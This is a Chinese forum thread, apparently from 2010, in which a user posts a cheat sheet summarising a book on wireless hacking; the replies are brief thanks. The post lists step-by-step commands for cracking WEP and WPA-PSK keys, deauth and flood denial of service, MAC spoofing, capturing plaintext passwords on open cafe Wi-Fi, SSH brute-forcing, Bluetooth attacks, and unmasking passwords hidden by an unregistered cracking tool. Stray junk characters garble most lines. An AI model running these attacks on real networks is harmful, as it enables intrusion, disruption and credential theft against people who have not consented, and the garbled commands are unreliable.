格西欧解决方案
树熊
查看: 9591|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3718

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Rippleos
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。% K$ ]/ P0 q0 B! d4 K; e  T

* _1 ~) `; |0 `9 J* A以下所有操作均在BackTrack 4中进行。
0 R2 N% \/ C; Z8 R* \' M% K; A0 v0 T! R( x# B( Y3 R& ^1 ?+ t

8 m6 ^4 _2 f* h& H5 H无线WEP加密P解:0 D4 [- B( G- A% V, Y3 O
0 f3 l* r3 N% E1 d5 v
注入P解:
% }; v( \/ N/ F5 n  e5 @$ ?- R9 s0 F# ]2 A
ifconfig# e7 S# P/ G7 z
; q. f' g1 z& R
ifconfig –a1 Z2 E4 V( P7 E+ d+ t6 J
, |6 ?$ Y8 k: a' E
ifconfig wlan0(无线网卡) up
6 X1 I5 s6 N$ n8 q
; Y5 L! J, e! S' B7 {airmon-ng start wlan0$ D* U( U+ a; `- B; z0 M( @

- Z( L( T" Z& gairodump-ng mon0
. L9 P3 M8 Z* {5 t! m
9 G6 ^) e2 R; ~% lairodump-ng --ivs –w ivsfile –c 频道 mon0或
" v' Q" F% `4 D1 a" `- f: i/ d
5 Y( B: T0 W; ]) Kairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon00 `! r# n4 c& b: H: ?
! o  }+ Q6 F8 ]+ C% A3 w9 B+ ]# z& y6 h
aireplay-ng -3 –b BSSID –h Station mon04 n; a3 @5 L- `: X" y; f

' g" C  C. P1 [# ~6 naircrack-ng ivsfile-01.ivs" l+ ~# a" J* r! G
* A( Y0 F$ D) c! r+ G  Y
虚连接P解(适用于无客户端连接APP解)
- q0 u1 R' h5 J2 q. G
4 j- A, A% Z3 d3 d5 {$ Aifconfig
  ?9 F+ Y7 P/ `- s& r/ T3 O- z8 c) F6 a  J% Q' }0 @+ @( M
ifconfig –a7 x- b6 g( f8 V
( n8 {; {0 h* W* Y! P- n( i3 ~
ifconfig wlan0(无线网卡) up
: n. ^3 A7 A: O3 |( ^& |5 ?) G5 B, M/ C6 k: Z& x/ D4 N$ c0 D
airmon-ng start wlan0
0 D: p0 n" m* X. k# X" k2 ^/ ^+ I4 V0 Z$ q& n6 X% k
airodump-ng mon05 D+ K  u& {5 ]

6 f5 O7 I4 T% a' M' P( hairodump-ng --ivs –w ivsfile –c 频道 mon0或
& X- J' j3 z6 b7 b) q( Y
1 u# t; X7 {4 C$ [, w$ }( lairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
8 Z  g$ N: F  \  ?% O
/ e; o4 T% ?2 F3 ?8 @aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
4 G; \9 V; D8 G7 {( E1 m
) f, F& @; C: x7 Jaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon02 G, E/ C0 [8 _1 }) `. U

$ r. \. `, N7 saircrack-ng ivsfile-01.ivs8 i" F1 I% {) n

2 P# b; q/ S, H' d% t# k! L/ p, {4 x) p: v- `2 y
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
. z6 I) O9 M7 _$ ^* a+ J  \( E) g% L
/ Q4 n" W2 N6 Y( i
WPA-PSKP解; h/ b. h0 ~# ^& C1 _) a6 i
1 B1 z3 N# I. R
ifconfig
0 T( Z, P9 H1 \
( [) t5 M  M3 T: }) ~; _( ~& aifconfig –a
" y' `2 m0 G' x7 T. I0 m1 B, U
% n3 w' d2 q* V7 A2 Eifconfig wlan0(无线网卡) up
! b0 C9 f# r1 ~" [+ Y" q) R' N# F0 Q3 Y
airmon-ng start wlan0% G/ N' S6 n+ f. B& e, s4 d/ Z6 l
# \4 c' i1 H2 T
airodump-ng mon03 F1 V" q& m7 R3 F7 E2 H7 h1 Z" H
, w, Q2 b, v+ P1 ]
airodump-ng –w capfile –c 频道 mon0
( s& m7 J3 M/ ]" Z0 |: ]$ m
8 _0 G2 ~2 |- c; T6 F& V  Oaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包1 E( I2 u( N3 u/ V' }7 V. ]

6 u2 R! ^( b- ]. d* E& |aircrack-ng –w Dic capfile-01.cap或. N4 o6 ^: }! Z7 D( l
, }; t4 l& p2 t: E: A# w' v% a* `
cowpatty –f Dic –r capfile-01.cap –s SSID1 y2 G5 @$ Y6 c7 X9 m- K
# {# \9 X' o$ w( m7 m, d' d1 S+ i
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
: k9 |6 z2 c9 r7 F9 r
1 E6 x/ H2 G  q0 f傻瓜式P解软件SpoonWPA。+ r6 g, v9 c4 h( `3 P

( c' r  e  i9 d$ A3 w- v6 @BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst8 q, v! {# F, E+ s

5 R9 u2 g! ]/ N9 x/ X  h  m' m0 n1 u2 u6 R5 E4 R* V
字典文件的生成和上传
5 W6 t$ Z) u. c( o; c( M2 W' P6 ]; m; h. N+ [
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
" m' d# u6 e+ V! M1 S+ ^; L* \8 k, I
1 A. }% Q8 H, Z" @3 j. h
BT4下开启Tftp:Services—TFTPD—start TFTPD
4 m3 h. o9 O/ W( y9 O( n
- F) I) n1 X2 H( k( g( }在Windows的CMD中运行 tftp –i IP put **.dic
1 t6 a* \, V5 R0 C1 Q1 X: U2 ?, u; q, Q+ y) {, |5 |

( a+ u. U. M: Z- I. @: J; OBT4下开启SSH:Services—SSH—start SSH
+ F: y$ G0 ^# R1 Y5 r7 p* y
& u: m* R2 W; T9 G7 |Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
5 L" N0 l1 q# }- z* a. N- M5 \  W$ m$ d- ?6 O8 }
. I* S) v3 a; E0 v" K  j. R
AP限制MAC时的解决( v8 b9 Q- B; _# n5 w: e7 q
( y8 P; E* e# E  N% L# d; S' y
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:# N& t) O9 ^+ q' Z) ]  R$ V

( t  o% I, g/ T- Pifconfig wlan0 hw ether NewMAC. u$ b! ^7 \% w5 }. G- N  ]

: W* i) |( V( @9 U! \6 B7 `# R/ F8 @& D# L8 g2 A2 B
关闭SSID广播的AP探测:
/ s1 G5 i4 Z8 F2 Y5 r
5 B) y+ {! N1 R0 z7 r1.     Deauth攻击:
/ I7 F. U& l4 }* A  v7 ^5 k6 W- _1 m9 \$ k4 N- K; L$ j
airodump-ng mon0
0 C3 A6 T1 d' K$ {8 q0 W6 w
2 U* {" s  q$ S, O  B* n7 s, Jaireplay-ng -0 10 –a BSSID –h Station mon0! ?- k7 x) X2 i- Y! t1 o. |) |% D, P
6 C6 L% W, y& n' ^8 M
2.     抓包分析  v1 u3 m, c7 M; s
3 l( [- n1 U9 A2 A
Omnipeek
) O4 u4 L  @2 V0 u0 u, r5 m  X2 I3 R$ e6 R1 b% I2 A1 m* h
Tcpdump –n –e –vvv –i 网卡名2 t* U/ x! N! e/ z7 I5 a( j
& y0 ?: ~5 W( ^0 ~7 `
3.     暴力P解
2 V) y1 E; s4 e9 g: H& F0 U- D. N- n' h2 z3 c
Charon 1.1暴力P解* E7 M0 G  H. D$ g5 _; m

) d& M' M3 s0 W" y8 C7 A- e% c6 I5 n) i) L# ?
无线加密数据包的解密
: l) O# N- U5 J& L+ s' A- }# g
+ P( g+ ?6 d9 x4 x) J3 V( n5 x5 p
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
" ]# f# T$ f- r& k; [5 Q# E
5 x: X" U& R1 Q2 N, T9 ^" GFilterNS     DNS解析数据包0 v5 \; Q9 g! \7 N8 l- q1 ]" l

( m- V" [9 n$ ~6 uFilter:HTTP    WEB访问数据包
: D: T0 |8 D$ G. s6 A. |# k. x' Y- y9 U5 ^
Filter:msnms   MSN
- e" a! C. Q9 k* g7 r1 y; u
7 i6 [6 X9 d& k1 ~' OCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。: W3 ?. V$ n. o; e

- q- K# W/ C; K+ e0 r8 H7 c1 _使用airdecap-ng解密:* V  P  p: K+ D. Q: ?1 v) A

) @6 y4 P* }4 Y/ i  z3 e* `Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
  l7 _5 i; S3 E4 G2 Y; n, G2 W) m
; q0 e  R: j* }1 n" r/ {' D
咖啡馆中无线数据截取(开放式无加密AP)
4 b" I9 c4 `+ J5 o+ F9 e$ {! C# o( o( q( P" {
1.Airodump-ng –w data –c频道 mon02 B) o) w) g* O
& R0 g3 i0 [( }! v, _+ o
2.使用WireShark打开分析# y+ _9 E+ j& Z! u$ l& i5 f
3 [: B! H7 f3 Q4 ~. z

# j5 K) [$ j$ o4 C5 NBT4下的渗透工具:
9 U- K+ P2 i8 o! F& S1 a4 l
, \) S" r; i7 K: \1 M. Mnmap –sP IP/24        判断C段下存活的主机
2 O: r6 u- X% h+ n5 v4 `( I/ t" z/ P2 O$ v3 n- T& j) F/ I5 n# C9 X
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
! H( x; G7 [: t8 X4 I! @+ z% h: S* m
nmap –vv –sV IP –p port   指定端口的详细信息。。。
- \) _  C4 A% q0 d) r$ K  ^
1 z, a1 @; u8 enamp –O IP/24    判断主机的系统版本( M* Q# a5 L1 S7 B0 h, h- V

) c, E& j" K8 W8 o( u! k* p7 o& Z( [. X+ [0 b
GUI 版nmap:Zenmap ' U7 d% l- L8 j7 L; \+ i( b' o

0 T" U1 M6 B$ x9 j; X7 t; v1 J" w6 b' a, E; \1 v
Amap使用:amap –B IP port7 }0 {& L9 w) `1 K6 i4 |, q' T; W" }
  {; _$ c) x( f5 I
Nbtscan(扫描Windows网络NetBios信息):3 [6 T& C$ U6 e$ Y/ ?8 o
7 W/ v" p9 A5 L4 M' D
nbtscan –v –s : IP/24( P$ W/ t& `8 c% v7 N2 [( q5 D
' H$ g3 ?  T* ?. h( ?6 C1 n! L. e
nbtscan –r IP5 c9 _3 Q, z! ?/ M2 K- X  t+ R
: X+ B7 ^* ]3 \! g. q
% M" {" G) }. Y" y. p
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.* n# J# C0 C3 q- v5 M/ G
9 p* U  P8 Y! C8 c2 Y# |0 C, r' F
. d! g: B3 U0 X- s
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)7 Z, i4 V7 p( R; X3 E( A: |

# x6 ]0 }, O* Q5 f5 YBruteSSH: ./bruthe.py –h IP –u Username –d Dic
) Z: x( T$ P' N7 m! Q6 M- p
' j+ o. l0 a& ^) Q% PMetasploit3使用
4 f" ?* g. d9 i无线D.0.S
- ]9 r; K) X1 B: K6 e: n- Q
6 L& b  }2 m- R# m8 f" M' \/ _( l2 S8 O3 U: X2 E- C2 V
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)/ D+ A$ g9 ^1 ~8 N' v: q# j4 O+ L

( k1 v5 X. f2 _6 l7 [* hairmon-ng start wlan0, x4 H( h! ^/ {

: R# c6 X4 n( m" Zairodump-ng mon0# n* O: B' m, X. I+ B  r* p4 x. Q

" s% x( A- `  [& j- Hmdk3 mon0 a –a BSSID8 O, p4 V7 k  C& v6 Y- S

, ]) _& }: i- Y, s$ Z% |* Y* B7 m2 }对所有的AP攻击:mdk3 mon0 a
0 W: O! m& \! v5 Q( H& ~, K/ h; j* {$ s9 L4 \' p

2 |4 g/ ?* r! n* X" i9 o$ CDeauth Flood 攻击. }- P$ t  P3 C- z& u4 b

$ _# u. ~8 |& umdk3 mon0 d –c Channel9 I& x6 d' Z* g# J
! E! e9 b' K' Q! j; {2 X1 G
图形化D.O.S攻击:Charon
6 c  b' J  k2 b* `3 `! G. n$ h3 C
' ]9 _' m8 j  Q% D- L; X" d1 _7 s5 X
当受到攻击时,使用Wireshark抓包可以看到异常信息。, h+ l" F# Y# s( Z! \! W* d

7 v8 v% @6 a8 i: X% t
) [  v4 \, k: h+ e8 f1 d7 u+ [  `. cWPA-PSK高速P解
6 E/ q. L# J2 B
3 V0 {( ?2 Z9 {: I9 t: [1.       WPA-PSK PMK Hash TablesP解6 n  Z5 {; e" v) F

/ r  ~* A8 r2 g' @Cowpatty –d HashTable.hash –r ***.cap –s SSID
& T4 L( ?# @: W2 y, y7 y: Z& n: q& h
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID1 d7 Y- ^: b; {8 S6 J) ?& K7 U

. a% _/ \' |1 p3 Y1 D: \  M6 C  u2.       GPU辅助高速P解* s: ]9 Y. K4 m- x, `7 V# O
! c  P4 b1 Q1 h& u9 ?( f
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。/ r5 g( V7 V2 O
, Z1 _. n* W- y- `: P
3.       分布式P解* N4 F- ^2 g3 J" d

1 R/ N5 V$ T: Q: y; \
& x% b5 q" F( _; f) WAP的伪造
$ b9 [  W' V8 I2 s6 w% g
2 o$ k  V- x0 ~& Z把AP的MAC改成目标AP的MAC
" D5 b( z. o1 P- V! y+ m0 c/ w1 J8 D; h7 V; S- F- ?& z; ~3 G, Z
网卡软AP
  ?4 D$ L3 {  L6 w
* k- D4 u) T$ g
  F% [$ P) w! b6 Q% u伪造大量虚假AP信号:
0 ~( _1 Z/ R, Z8 g9 J; j/ ?
$ Y- F: f) H: L3 w随机SSID:mdk3 mon0 b –g –c 频道
) N" \* t" {1 R# ~* h2 V& }
5 W/ _& e; y% Q$ m, {# U% A$ ]指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
) Q. t1 U* U: `7 _: C  S  K  G& L, B( x: A% A5 `) ~2 Z

3 q6 L6 T3 }! ]0 VWar-Driving
4 u; g" H$ C& w* e5 D+ n" N) v. x: y# ^  u' [+ h
热点地图绘制
7 e8 d, W; u" [5 G& V( m. |' a9 i" M. `9 j
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。5 s: B2 z9 r' T7 n7 w: b0 q4 Y

' R4 E4 Q3 g9 U2 G6 ?- z+ z* A6 t) j
Netstumble2 O4 A& u7 N3 {1 v
* ?' @3 @  B2 }) T4 ]
  e9 w* K; @* }  o5 j: n
蓝牙Hacking& x; U! w2 ?9 M& c& n

6 Q8 c# p5 v5 g6 h0 S4 xWindows下的Blue Soleil工具
  k' ?2 |. x1 C4 a: g
9 D0 m, @& G; c) F$ w+ Y8 \BT4:9 a  k7 H' @5 f( j8 h  f
4 i1 c% n" S( t  u
hciconfig 查看蓝牙适配器) O- ]. Z2 D. i4 k! ^

: o) p  k; q8 K1 z# `4 Uhciconfig hci0 up 载入蓝牙适配器- p" ?! O2 P: W$ V

9 H0 j# l) B; C% Z  Ohciconfig hci0 class 蓝牙适配器详细信息3 \/ H: v8 J* P
9 y0 q0 F7 t7 Z$ n6 o( F

; ^: E" S! K/ \+ e/ l' bhcitool(扫描蓝牙)! P! H) s) k8 i- D: E4 I2 _3 c
% S6 q) `  G, p6 t2 T4 L
hcitool –i hci0 scan8 `+ \. v4 G; j: F+ v# T/ W

% b" i/ s/ v, wBTscanner(扫描蓝牙)
, f" m9 N) l( b( D- v% v: U" }/ Z0 J0 M, Q
1 H1 d* u4 L2 g5 R
蓝牙攻击:# s; }( i, L' _+ w

$ z! F. v9 O; V. \' ?BlueBugging (适用于BlueTooth V1.1的手机)
; t: ?$ [1 |$ ?: C+ M! T8 g9 z
1 d; J+ n- Y+ ?0 p* g; sBluebugger工具:* l6 f* Q' T  ~
$ G6 D6 R  ]% {
Bulebugger –a HD_Addr info1 y# p/ U' F" l

3 L+ v" N) T1 Y: P/ y& L  V6 d* S. I9 S/ j' N4 N& x; w
BlueJacking
) ^& ^2 O9 t. X1 O
3 R0 B. n- F8 q# W% N8 W7 p实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
: o+ `/ v, p7 H6 Z
* _! l5 ], |: V. |- x
# Q' c* _! A9 _; ^8 bHD_Addr修改:
2 n5 U' o7 l' n  d, n8 q# O' {$ n! Q6 W! J4 m$ p4 `+ u5 g/ D
Bdaddr工具1 z! x5 {0 M' N  P; n) E, E

8 n& d6 ~; p; Q' ~, ibdaddr –i 蓝牙设备名 新HD_addr
/ c6 E7 W& R; y* _
& q4 k& P+ |5 x9 e! X) b
3 {8 q4 K7 N9 n1 U蓝牙D.O.S3 I0 H6 @& W1 C- x
) i; u- q8 z1 E: p7 R7 H
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
* H, B% V4 _8 q/ f  I
3 ]/ V( L5 s$ W* i7 C* ehciconfig
; l! s  |! Z, a8 ?" [- W2 y& R& M9 K" s8 u3 x
hciconfig hci0 up
6 L& L' i3 u  W7 d" K) f2 L" i3 o: B8 c. S5 r% @: `
hcitool –i hci0 scan
5 d8 |" C' \4 H0 b$ y5 P; N
" K2 M9 k' D1 f/ t/ l" U# X" Y. Bl2ping –s 10000 –目标MAC
0 U: G8 Z7 w: G; P
* U4 G) o* F% V$ V# t/ D! Z9 f  Y$ I0 N0 h  N
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
+ k$ o; X5 U9 C0 ^6 z
9 S1 `  C" e& p2 p) ^. j9 l8 L./fang –r ************-############ -s
* i/ P2 n5 Q$ x# ?7 P/ J! ^) w1 Z3 D1 w" T  Q/ K8 l
暴力P解************-############的蓝牙设备
, o7 `! {, C) w! O+ c- Z0 K! {
& M( _  O8 e  _3 e! F./fang –l 各厂商BD_Addr分配
2 b" [0 x0 n: b) n& n, Y! W( j' L/ [, L$ a/ R3 I
; q, ]0 }5 U+ j& ~
WifiZoo使用, y% \- `" \# ]7 _
6 ^! ?, C! @4 G+ T3 }
./wifizoo.py –c Capfile
# x+ [1 n  z8 S# b* r( s: r$ m  Q: H  b! `. L5 ?# G
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

785

积分

中尉

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。  B( Y: D. W; C
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的. z! O) _+ ~) Z- e# M6 t
呵呵 其实也不贵 21块 快递再一点( ^, {2 P3 B2 R; z% \) _
我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2015-7-5 21:16 , Processed in 0.227717 second(s), 36 queries , Gzip On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表